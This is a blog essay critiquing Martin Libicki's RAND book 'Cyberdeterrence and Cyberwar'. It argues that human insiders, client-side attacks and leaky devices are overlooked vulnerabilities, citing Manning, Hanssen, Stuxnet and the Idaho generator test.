Infiltrated dot Net

Re-analyzing Cyberdeterrence and Cyberwarfare
Written by Jesus Oquendo   

Cyberdeterrence and Cyberwarfare by Martin C. Libicki from the RAND corporation [1] was an interesting read but I noticed it contains many short-sighted descriptions and theories that can possibly lower the defensive and offensive posture of any government, military, or private sector industry that views the opinion as a "de-facto" source, to be relied upon. My perspective comes from some of the statements and assumptions that the author makes. For example, Libicki states: "Cyberattacks Are Possible Only Because Systems Have Flaws." [1 pp 14] Unsure if this statement comes from the knowledge available to the author at the time, or if this is what the author truly believed and or believes at present time.

A computing system will always have some form of flaw, however, to think that this is the only possibility that an attack will be successful, is also flawed. Rather than get into a long discussion of the successes and failures of computing systems, I would like to point out the obvious, that humans are flawed often moreso than computers, the programs and or code on those systems. An establishment can create complex mechanisms and rules to secure systems to the Nth degree, but human error can cause the security of those systems to fail repeatedly.


No more was this evident than in the cases of Bradley Manning [2] and Robert Hanssen [3 pp. 28–33]. These two had access to classified and "air gapped" [4] systems. Policies, controls and deterrents were put in place yet all failed allowing the men to cause real damage. While one can question whether Manning and Hanssen are relevant to the cyberwarfare discussion, the relevancy here stems from the erroneous statement that "Cyberattacks Are Possible Only Because Systems Have Flaws." Moreover even I am flawed in my explanation and counter due to my broad interpretation of the word "systems" in that statement. My interpretation being "information or computing systems."

In the book, the author continued with: "Operational Cyberwar Has an Important Niche Role, but Only That" For operational cyberwar—acting against military targets during a war—to work, its targets have to be accessible and have vulnerabilities. These vulnerabilities have to be exploited in ways the attacker finds useful. It also helps if effects can be monitored. [1 pp 15]" The above statement is a very narrow assumption and short sided theory. Accessibility need not be defined as accessibility from "the Internet" or accessibility by an enemy. Accessibility by any individual introduces a threat to the system as a whole. Whether it is an enemy accessing this system or trusted individual as already explained using Manning and Hanssen as examples. While the two mentioned may be extreme cases, and the likelihood of a repeat low, humans often cause more damage than buggy code, bad applications and exploits. An attacker thereby can use the human itself as the vulnerability as is often the case in targeted "client side" [5] attacks.

In the sentence: "These vulnerabilities have to be exploited in ways the attacker finds useful", the author may not have been cognizant of client side attacks or may not have fully understood the weight of the risk due to human error. Almost all and any attacks are useful and anyone studying about cyberwarfare needs to take a greater view of the attacks from different perspectives. In cyberwarfare, the attacks will not solely rely on whether or not a system is vulnerable, system interpreted as a physical computer or software, but an analyst should try to look at all possible conclusions and outcomes which may affect a target. This includes the systems and operators of those systems, the humans.

Assume that I needed to access a system behind an air-gapped network. Is it safe to assume that, since I have no access to that system, or since that system is not accessible to outside sources, the system is secure? It would be absurd to make such broad statements especially in the light of information that made its way unto Wikileaks. The failures of the Manning incident may have come from a lack of oversight, blind trust and perhaps even system accounting. At the end of the day, the outcome was similar to an outside attacker trying to access information. The same analytics should apply to the second quote from the book: "acting against military targets during a war—to work, its targets have to be accessible and have vulnerabilities." An attacker need not have accessibility in order to exploit an "individual" who has access to these systems. Sometimes human error are our own worst enemy.

Lack of accounting and or auditing can lead to horrific outcomes. Imagine for a moment that soldiers on the battleground have in their possession, something as simple as an iPod. Perhaps the iPod is doing nothing but sitting inside of a Hummer. There is the possibility that a rogue application can transmit geolocation data to an enemy rendering any element of surprise useless. This iPad example demonstrates an exploitable vulnerability even though there is no buggy code or exploitable attack vector. While it will not allow an enemy to shut down say a missile system, it still is a vulnerability.

Further in the book, the author stated: "The United States and, by extension, the U.S. Air Force, should not make strategic cyberwar a priority investment area. Strategic cyberwar, by itself, would annoy but not disarm an adversary." [1 pp 20] While reading, I found this to be another broad statement based on assumption. As explained in the previous paragraph, the possible outcome would be dire since locations would be exposed. The annoyance and danger here would be reversed, not affecting the adversary but our own.

Military commanders and generals responsible for strategies could spend hours re-analyzing how their locations are constantly being exposed. Money down the drain. Soldiers may even be injured as a result or even worse loss of life. All the while the vulnerability existed from something as simple as an iPad or a mobile phone.  Furthermore, there is the possibility of disarming an adversary's system using cyberwarfare. No more was this evident than in the Stuxnet infection which affected Iran [6] and in the demonstration by Idaho National Labs which destroyed a generator. [7]

Anyhow, I will continue to read the book as it is an interesting read. Hopefully the thinkers can broaden their scope of cyberwarfare using "outside the box" information.

 



[1] Cyberdeterrence and cyberwar / Martin C. Libicki. ISBN 978-0-8330-4734-2
[2] http://en.wikipedia.org/wiki/Bradley_Manning
[3] Wise, David (2003), Spy: The Inside Story of How the FBI's Robert Hanssen Betrayed America
[4] http://en.wikipedia.org/wiki/Air_gap_%28networking%29
[5] http://www.honeynet.org/node/157
[6] http://en.wikipedia.org/wiki/Stuxnet
[7] http://articles.cnn.com/2007-09-26/us/power.at.risk_1_generator-cyber-attack-electric-infrastructure?_s=PM:US